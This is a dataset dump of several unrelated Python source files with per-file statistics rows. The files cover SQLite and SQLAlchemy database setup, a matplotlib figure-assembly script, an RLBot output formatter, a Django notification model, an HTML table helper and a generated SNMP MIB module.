# conn.commit()
# conn.close()
conn = connect('yourdb.db')
c = conn.cursor()
c.executescript('''create table yourtable(word, meaning, level, time);
insert into yourtable values('test_workd0', 'test_meaning0', 1, datetime('now'));
insert into yourtable values('test_workd1', 'test_meaning1', 2, datetime('now'));''')
c.close()
conn.commit()
conn.close() | 31.935897 | 118 | 0.660779 | 348 | 2,491 | 4.678161 | 0.301724 | 0.049754 | 0.030713 | 0.04914 | 0.425061 | 0.335381 | 0.320025 | 0.320025 | 0.320025 | 0.238329 | 0 | 0.026939 | 0.135688 | 2,491 | 78 | 119 | 31.935897 | 0.729215 | 0.809314 | 0 | 0 | 0 | 0 | 0.551069 | 0.099762 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7afc81f420c7a7b1650e0243a1f216e195ab99db | 642 | py | Python | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | null | null | null | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | 10 | 2022-02-27T11:01:23.000Z | 2022-03-29T12:53:33.000Z | api/app/database.py | Le96/todays-mazai | 1af8f57d7827d883a6c91661dc375b79274c94f5 | [
"MIT"
] | null | null | null | import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
USER = os.getenv("DB_USER")
PASS = os.getenv("DB_PASSWORD")
HOST = os.getenv("DB_HOST")
PORT = os.getenv("DB_PORT")
SCHEMA = os.getenv("DB_SCHEMA")
SQLALCHEMY_DATABASE_URL = f"postgresql+psycopg2://{USER}:{PASS}@{HOST}:{PORT}/{SCHEMA}"
engine = create_engine(SQLALCHEMY_DATABASE_URL)
Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
Base = declarative_base()
def get_session():
session = Session()
try:
yield session
finally:
session.close()
| 23.777778 | 87 | 0.739875 | 83 | 642 | 5.554217 | 0.421687 | 0.086768 | 0.10846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001805 | 0.137072 | 642 | 26 | 88 | 24.692308 | 0.830325 | 0 | 0 | 0 | 0 | 0 | 0.154206 | 0.090343 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.105263 | 0.210526 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7afeb71053feedae92609691ef2291871af9e5e1 | 7,346 | py | Python | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | 1 | 2019-11-19T13:48:33.000Z | 2019-11-19T13:48:33.000Z | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | null | null | null | src/visualization/visualize_all.py | mwegrzyn/volume-wise-language | ed24b11667e6b26d3ed09ce0aae383c26852821c | [
"MIT"
] | null | null | null |
# coding: utf-8
# # Collect axes and make big plot
#
# This notebook is used to collect the output of all analyses which were ran for a single patient and to wrap all generated figures in a big plot which consists of multiple subplots. As with other notebooks which are needed to analyses single-subject data, this one uses the "tag" attribute of the cells to decide which cells should be not be ran in toolbox mode and which ones have to run in toolbox mode. This allows to convert them to .py scripts which can than be used by the src module.
# ### import modules
# In[1]:
import os
import glob
import pickle
from PIL import Image
import matplotlib.pyplot as plt
import seaborn as sns
# In[2]:
sns.set_context('poster')
sns.set_style('ticks')
# In[3]:
# after converstion to .py, we can use __file__ to get the module folder
try:
thisDir = os.path.realpath(__file__)
# in notebook form, we take the current working directory (we need to be in 'notebooks/' for this!)
except:
thisDir = '.'
# convert relative path into absolute path, so this will work with notebooks and py modules
supDir = os.path.abspath(os.path.join(os.path.dirname(thisDir), '..'))
supDir
# ### get data
#
## In[4]:
#
#
#MY_DIR = '../examples/'
#
#
#
## In[5]:
#
#
#p_name = 'patID'
#
#
# ### collect plots
# In[6]:
def get_plots(MY_DIR,p_name):
subplot_dict = {}
axes_list = glob.glob('%s%s*.png'%(MY_DIR,p_name))
for a in axes_list:
plot_name = a.split('_')[-1].split('.')[0]
subplot_dict[plot_name] = a
return subplot_dict
#
## In[7]:
#
#
#subplot_dict = get_plots(MY_DIR,p_name)
#
#
#
## In[8]:
#
#
#subplot_dict
#
#
# ### outline of subplot arrangement
#
## In[9]:
#
#
#fig = plt.figure(figsize=(16, 6))
#
#ax1 = fig.add_axes([0, 2.8, 1.55, 1.], xticklabels=[], yticklabels=[]);ax1.set_title(1,fontsize=100,y=0.5)
#ax2 = fig.add_axes([0.35, 2.8, .85, .25], xticklabels=[], yticklabels=[]);ax2.set_title(2,fontsize=100,y=0.5)
#ax3 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[]);ax3.set_title(3,fontsize=100,y=0.5)
#ax4 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[]);ax4.set_title(4,fontsize=100,y=0.5)
#ax5 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax5.set_title(5,fontsize=100,y=0.5)
#ax6 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax6.set_title(6,fontsize=100,y=0.5)
#ax7 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[]);ax7.set_title(7,fontsize=100,y=0.5)
#ax8 = fig.add_axes([1.25, 0.05, .3, 1.15], xticklabels=[], yticklabels=[]);ax8.set_title(8,fontsize=100,y=0.5)
#
#plt.show()
#
#
# ### make a legend for all
#
## In[10]:
#
#
#colors_file = os.path.join(supDir,'models','colors.p')
#with open(colors_file, 'rb') as f:
# color_dict = pickle.load(f)
#
#my_cols = {}
#for i, j in zip(['red', 'blue', 'yellow'], ['left', 'right', 'bilateral']):
# my_cols[j] = color_dict[i]
#
#
#
## In[11]:
#
#
#plt.figure(figsize=(5.6,3))
#for group in my_cols.keys():
# plt.plot([-1,-1],'o',c=my_cols[group],label=group)
#plt.bar(-1,-1,color=color_dict['trans'],label='task sections')
#plt.bar(-1,-1,color=color_dict['black'],alpha=0.2,label='standard deviation')
#plt.xlim(0,1)
#plt.ylim(0,1)
#plt.legend(bbox_to_anchor=(0, 0., 1, 1),mode='expand')
#plt.xticks([])
#plt.yticks([])
#sns.despine(left=True,bottom=True)
#plt.savefig('%slegend.png'%MY_DIR,dpi=300,bbox_inches='tight')
#plt.show()
#
#
# ### fill subplots with content
# In[12]:
sns.set_style('dark')
#
## In[13]:
#
#
#subplot_dict.keys()
#
#
#
## In[19]:
#
#
#fig = plt.figure(figsize=(16, 6))
#
#ax1 = fig.add_axes([0, 2.8, 1.55, 1.], xticklabels=[], yticklabels=[])
#ax1.imshow(Image.open(subplot_dict['tMapBrain']))
#
#ax2 = fig.add_axes([0.45, 2.8, .65, .25], xticklabels=[], yticklabels=[])
#ax2.imshow(Image.open(subplot_dict['tMapCbar']))
#
#ax3 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[])
#ax3.imshow(Image.open(subplot_dict['timeAll200trs']))
#
#ax4 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[])
#ax4.imshow(Image.open(subplot_dict['timeCycle20trs']))
#
#ax5 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax5.imshow(Image.open(subplot_dict['donut']))
#
#ax6 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax6.imshow(Image.open(subplot_dict['predSpace']))
#
#ax7 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
#ax7.imshow(Image.open(subplot_dict['logFunc']))
#
#ax8 = fig.add_axes([1.25, 0.05, .3, 1.25], xticklabels=[], yticklabels=[])
#ax8.imshow(Image.open('../examples/legend.png'))
#
#plt.text(0, 0.8, 'A',transform=ax1.transAxes, fontsize=64)
#plt.text(0, -0.2, 'B',transform=ax1.transAxes, fontsize=64)
#plt.text(0.19, -2, 'C',transform=ax1.transAxes, fontsize=64)
#plt.text(0.03, -4.1, 'D',transform=ax1.transAxes, fontsize=64)
#plt.text(0.35, -4.1, 'E',transform=ax1.transAxes, fontsize=64)
#plt.text(0.675, -4.1, 'F',transform=ax1.transAxes, fontsize=64)
#
#plt.savefig('../reports/figures/16-individual-example-plot.png',dpi=300,bbox_inches='tight')
#
#plt.show()
#
#
# #### toolbox use
legend_filename = os.path.join(supDir,'visualization','legend.png')
def make_p(pFolder,pName,legend_filename=legend_filename):
subplot_dict = get_plots(pFolder,pName)
fig = plt.figure(figsize=(16, 6))
ax1 = fig.add_axes([0, 1.5, 1.55, 1.25], xticklabels=[], yticklabels=[])
ax1.imshow(Image.open(subplot_dict['timeAll200trs']))
ax2 = fig.add_axes([0.2, -0.05, 1.15, 1.5], xticklabels=[], yticklabels=[])
ax2.imshow(Image.open(subplot_dict['timeCycle20trs']))
ax3 = fig.add_axes([.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax3.imshow(Image.open(subplot_dict['donut']))
ax4 = fig.add_axes([.55, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax4.imshow(Image.open(subplot_dict['predSpace']))
ax5 = fig.add_axes([1.05, -1.3, .45, 1.15], xticklabels=[], yticklabels=[])
ax5.imshow(Image.open(subplot_dict['logFunc']))
ax6 = fig.add_axes([1.25, 0.05, .3, 1.25], xticklabels=[], yticklabels=[])
ax6.imshow(Image.open(legend_filename))
plt.suptitle(pName,fontsize=48,x=0.75,y=2.95)
out_name = os.path.join(pFolder,''.join([pName,'_all.png']))
plt.savefig(out_name,dpi=300,bbox_inches='tight')
plt.close()
return out_name
# ### summary
#
# Seeing the results on the level of N=1 allows to get a more in-depth perspective on the data and on the robustness of the analyses in the single case. Most of the plots generated here allow to combine prospectively collected data with the original dataset which was used to train the models. Some of the plots only make sense on the single-subject level, for example the volume-wise classification on the time course could not be represented in an intelligible way on the group level. Also, using a doughnut plot only makes sense on the individual level. The different ways of visualizing the data contain some amount of redundancy, but in a clinical context/for an application this might be useful to look for (in)consistencies and look at the same dataset from varying points of view.
#
#
# **************
#
# < [Previous](15-mw-visualize-logistic-regression.ipynb) | [Contents](00-mw-overview-notebook.ipynb)
| 29.502008 | 788 | 0.668255 | 1,201 | 7,346 | 4.003331 | 0.263114 | 0.027454 | 0.045757 | 0.054908 | 0.404742 | 0.375 | 0.320923 | 0.300125 | 0.208611 | 0.208611 | 0 | 0.066468 | 0.133678 | 7,346 | 248 | 789 | 29.620968 | 0.689032 | 0.702151 | 0 | 0 | 1 | 0 | 0.056585 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.139535 | 0 | 0.232558 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb0075e257517d7ea8e7b80a522763cdff7b8198 | 1,178 | py | Python | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | dragonbot/game/output.py | Chainso/DragonBot | c431cd42be8672259164c9ee4ab338cbc624bec9 | [
"MIT"
] | null | null | null | import torch
import numpy as np
from rlbot.agents.base_agent import SimpleControllerState, BaseAgent
class OutputFormatter():
"""
A class to format model output
"""
def transform_action(self, action):
"""
Transforms the action into a controller state.
"""
action = action[0].detach().cpu().numpy()
# Convert the last 3 actions to their boolean values
action = np.concatenate((action[:5], (action[5:] >= 0)), axis = 0)
controller_out = BaseAgent.convert_output_to_v4(self, action)
return controller_out
def transform_output(self, model_output):
"""
Transforms the output to the new controller state and the action or
state value.
"""
action, val = model_output
action = self.transform_action(action)
val = val.detach()
return action, val
@staticmethod
def action_space():
"""
Returns the number of output actions.
"""
return 8
class RecurrentOutputFormatter(OutputFormatter):
def transform_action(self, action):
return OutputFormatter.transform_action(self, action[0]) | 26.772727 | 75 | 0.634975 | 133 | 1,178 | 5.518797 | 0.421053 | 0.081744 | 0.077657 | 0.10218 | 0.076294 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010539 | 0.275042 | 1,178 | 44 | 76 | 26.772727 | 0.848946 | 0.211375 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.15 | 0.05 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb124a8e52d8aee500e19c656533c54c1cedaf7a | 1,252 | py | Python | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 164 | 2019-07-29T17:59:06.000Z | 2022-03-19T21:36:01.000Z | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 188 | 2019-03-16T09:53:25.000Z | 2019-07-25T14:57:24.000Z | openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 80 | 2019-08-03T17:49:08.000Z | 2022-02-28T16:56:33.000Z | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from openbook_notifications.models.notification import Notification
from openbook_posts.models import PostReaction
class PostReactionNotification(models.Model):
notification = GenericRelation(Notification, related_name='post_reaction_notifications')
post_reaction = models.ForeignKey(PostReaction, on_delete=models.CASCADE)
@classmethod
def create_post_reaction_notification(cls, post_reaction_id, owner_id):
post_reaction_notification = cls.objects.create(post_reaction_id=post_reaction_id)
Notification.create_notification(type=Notification.POST_REACTION,
content_object=post_reaction_notification,
owner_id=owner_id)
return post_reaction_notification
@classmethod
def delete_post_reaction_notification(cls, post_reaction_id, owner_id):
cls.objects.filter(post_reaction_id=post_reaction_id,
notification__owner_id=owner_id).delete()
@classmethod
def delete_post_reaction_notifications(cls, post_reaction_id):
cls.objects.filter(post_reaction_id=post_reaction_id).delete()
| 46.37037 | 92 | 0.750799 | 137 | 1,252 | 6.489051 | 0.270073 | 0.24297 | 0.141732 | 0.091114 | 0.371204 | 0.267717 | 0.267717 | 0.209224 | 0.209224 | 0.103487 | 0 | 0 | 0.189297 | 1,252 | 26 | 93 | 48.153846 | 0.875862 | 0 | 0 | 0.142857 | 0 | 0 | 0.021566 | 0.021566 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.190476 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb1b93056048ded04fe462901d7cdde0ccfcd081 | 4,991 | py | Python | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 8 | 2017-07-27T11:25:41.000Z | 2019-03-11T12:02:48.000Z | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 33 | 2018-04-04T20:45:59.000Z | 2019-03-07T12:54:37.000Z | astetik/tables/table.py | meirm/astetik | ea05ce57a0bf1e8bd7ef18c4d5ca8d7ad3fb4be7 | [
"MIT"
] | 3 | 2018-10-19T15:50:55.000Z | 2018-10-23T04:32:39.000Z | import pandas as pd
from IPython.core.display import display, HTML
def table(data,
title="Descriptive Stats",
sub_title="",
table_width=630,
indexcol_width=150,
return_html=False):
'''Displays a publication quality data table
with any number of columns and aspects. Works
best for 6-7 or less columns datasets.
data | DataFrame | a dataframe with three columns of numeric data
title | str | the main title of the table
sub_title | str | shown below the title
table_width | int | the width of the table in pixels
indexcol_width | int | the width of th index column in pixels.
Width of the data columns is computed based on `table_width` and
`indexcol_width` values.
'''
html = '''
<style type=\"text/css\">
.tg {
border-collapse:collapse;
border-spacing:0;
border:none;}
.tg td {
font-family: Arial, sans-serif;
font-size:14px;
padding:10px 5px;
border-style:solid;
border-width:0px;
overflow:hidden;
word-break:normal;
}
.tg th {
font-family:Arial, sans-serif,
sans-serif;
font-size:14px;
font-weight:normal;
padding:10px 5px;
border-style:solid;
border-width:0px;
overflow:hidden;
word-break:normal;
}
.tg .tg-index {
font-family:Verdana, Geneva, sans-serif !important;
text-align: left;
padding-left: 10px;
vertical-align:top
}
.tg .tg-anay {
font-family:Verdana, Geneva, sans-serif !important;
text-align:right;
vertical-align:top
}
.tg .tg-jua3 {
font-weight:bold;
font-family:Verdana, Geneva, sans-serif !important;
text-align:right;vertical-align:top
}
hr {
height: 1px;
background-color: #333;
padding: 0px;
margin: 0px;
}
.hr2 {
height: 2px !important;
background-color: #333;
}
table {
table-layout: fixed;
width: 500px;
border-style:hidden;
border-collapse: collapse;\"
margin-top: 0px;
padding-top: 0px;
}
.title {
font-family: Arial, sans-serif;
font-style: italic;
font-size: 22px;
font-weight: bold;
padding-bottom: 0px;
}
.sub_title {
font-size: 18px;
font-family: Arial, sans-serif;
margin-top: 8px !important;
padding-bottom: 12px;
}
</style>
<table class=\"tg\">
<colgroup>
<col style=\"width: _INDEXCOL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
<col style=\"width: _COL_WIDTH_px\">
</colgroup>
<p class='title'> _TABLE_TITLE_ </p>
<p class='sub_title'> _TABLE_SUBTITLE_ </p>
<hr align=\"left\", width=\"_TABLE_WIDTH_\">
<tr>
<th class=\"tg-index\"></th>
'''
# add columns
for col in data.columns:
html += '<th class=\"tg-anay\">' + str(col) + '</th>'
for index in data.index:
html += '</tr><tr><td class=\"tg-index\">' + str(index) + '</td>'
for col in data.columns:
html += '<td class=\"tg-jua3\">' + f'{data.loc[index][col]:,}' + '</td>'
html +='''
</tr>
</table>
<hr align=\"left\", width=\"_TABLE_WIDTH_\">
'''
col_width = int((table_width - indexcol_width) / len(data.columns))
html = html.replace('_TABLE_TITLE_', title)
html = html.replace('_TABLE_SUBTITLE_', sub_title)
html = html.replace('_TABLE_WIDTH_', str(table_width))
html = html.replace('_COL_WIDTH_', str(col_width))
html = html.replace('_INDEXCOL_WIDTH_', str(indexcol_width))
display(HTML(html))
if return_html:
return print(html) | 31 | 84 | 0.445001 | 474 | 4,991 | 4.556962 | 0.278481 | 0.037037 | 0.030093 | 0.035185 | 0.362037 | 0.275463 | 0.204167 | 0.204167 | 0.204167 | 0.181019 | 0 | 0.017825 | 0.449209 | 4,991 | 161 | 85 | 31 | 0.767916 | 0.099579 | 0 | 0.293103 | 0 | 0 | 0.79901 | 0.039838 | 0.008621 | 0 | 0 | 0 | 0 | 1 | 0.008621 | false | 0 | 0.060345 | 0 | 0.077586 | 0.008621 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb216b1449c4bdf268511506ad9bcc2b2c3b4fcc | 7,032 | py | Python | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/TIMETRA-CLEAR-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module TIMETRA-CLEAR-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TIMETRA-CLEAR-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:09:48 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
IpAddress, Bits, Integer32, Counter64, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, TimeTicks, Gauge32, Unsigned32, Counter32, ObjectIdentity, ModuleIdentity, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Bits", "Integer32", "Counter64", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "TimeTicks", "Gauge32", "Unsigned32", "Counter32", "ObjectIdentity", "ModuleIdentity", "MibIdentifier")
TimeStamp, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "DisplayString", "TextualConvention")
tmnxSRNotifyPrefix, tmnxSRObjs, tmnxSRConfs, timetraSRMIBModules = mibBuilder.importSymbols("TIMETRA-GLOBAL-MIB", "tmnxSRNotifyPrefix", "tmnxSRObjs", "tmnxSRConfs", "timetraSRMIBModules")
tmnxEventAppIndex, = mibBuilder.importSymbols("TIMETRA-LOG-MIB", "tmnxEventAppIndex")
TmnxActionType, TNamedItem = mibBuilder.importSymbols("TIMETRA-TC-MIB", "TmnxActionType", "TNamedItem")
timetraClearMIBModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 6527, 1, 1, 3, 13))
timetraClearMIBModule.setRevisions(('1905-01-24 00:00', '1904-06-02 00:00', '1904-01-15 00:00', '1903-08-15 00:00', '1903-01-20 00:00', '1902-02-27 00:00',))
if mibBuilder.loadTexts: timetraClearMIBModule.setLastUpdated('0501240000Z')
if mibBuilder.loadTexts: timetraClearMIBModule.setOrganization('Alcatel-Lucent')
tmnxClearObjs = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13))
tmnxClearNotificationsPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13))
tmnxClearNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13, 0))
tmnxClearConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13))
tmnxClearTable = MibTable((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1), )
if mibBuilder.loadTexts: tmnxClearTable.setStatus('current')
tmnxClearEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1), ).setIndexNames((0, "TIMETRA-LOG-MIB", "tmnxEventAppIndex"), (0, "TIMETRA-CLEAR-MIB", "tmnxClearIndex"))
if mibBuilder.loadTexts: tmnxClearEntry.setStatus('current')
tmnxClearIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)))
if mibBuilder.loadTexts: tmnxClearIndex.setStatus('current')
tmnxClearName = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 2), TNamedItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearName.setStatus('current')
tmnxClearParams = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255)).clone(hexValue="")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: tmnxClearParams.setStatus('current')
tmnxClearAction = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 4), TmnxActionType().clone('notApplicable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: tmnxClearAction.setStatus('current')
tmnxClearLastClearedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearLastClearedTime.setStatus('current')
tmnxClearResult = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("success", 1), ("failure", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearResult.setStatus('current')
tmnxClearErrorText = MibTableColumn((1, 3, 6, 1, 4, 1, 6527, 3, 1, 2, 13, 1, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: tmnxClearErrorText.setStatus('current')
tmnxClear = NotificationType((1, 3, 6, 1, 4, 1, 6527, 3, 1, 3, 13, 0, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearName"), ("TIMETRA-CLEAR-MIB", "tmnxClearParams"), ("TIMETRA-CLEAR-MIB", "tmnxClearLastClearedTime"), ("TIMETRA-CLEAR-MIB", "tmnxClearResult"), ("TIMETRA-CLEAR-MIB", "tmnxClearErrorText"))
if mibBuilder.loadTexts: tmnxClear.setStatus('current')
tmnxClearCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 1))
tmnxClearGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2))
tmnxClearCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 1, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearGroup"), ("TIMETRA-CLEAR-MIB", "tmnxClearNotificationGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
tmnxClearCompliance = tmnxClearCompliance.setStatus('current')
tmnxClearGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2, 1)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClearName"), ("TIMETRA-CLEAR-MIB", "tmnxClearParams"), ("TIMETRA-CLEAR-MIB", "tmnxClearAction"), ("TIMETRA-CLEAR-MIB", "tmnxClearLastClearedTime"), ("TIMETRA-CLEAR-MIB", "tmnxClearResult"), ("TIMETRA-CLEAR-MIB", "tmnxClearErrorText"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
tmnxClearGroup = tmnxClearGroup.setStatus('current')
tmnxClearNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 6527, 3, 1, 1, 13, 2, 2)).setObjects(("TIMETRA-CLEAR-MIB", "tmnxClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
tmnxClearNotificationGroup = tmnxClearNotificationGroup.setStatus('current')
